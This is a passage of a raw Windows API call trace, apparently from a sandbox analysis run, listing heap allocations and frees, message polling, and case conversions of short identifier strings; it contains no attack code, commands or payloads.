hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.977] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.977] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.978] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.978] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.978] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.978] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.978] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.978] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.979] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.979] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.980] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.980] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.980] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.980] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.980] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.983] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.983] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.983] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.984] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.984] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.985] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.985] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.985] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.985] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.985] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.985] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.986] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.986] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.986] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.987] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.987] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, 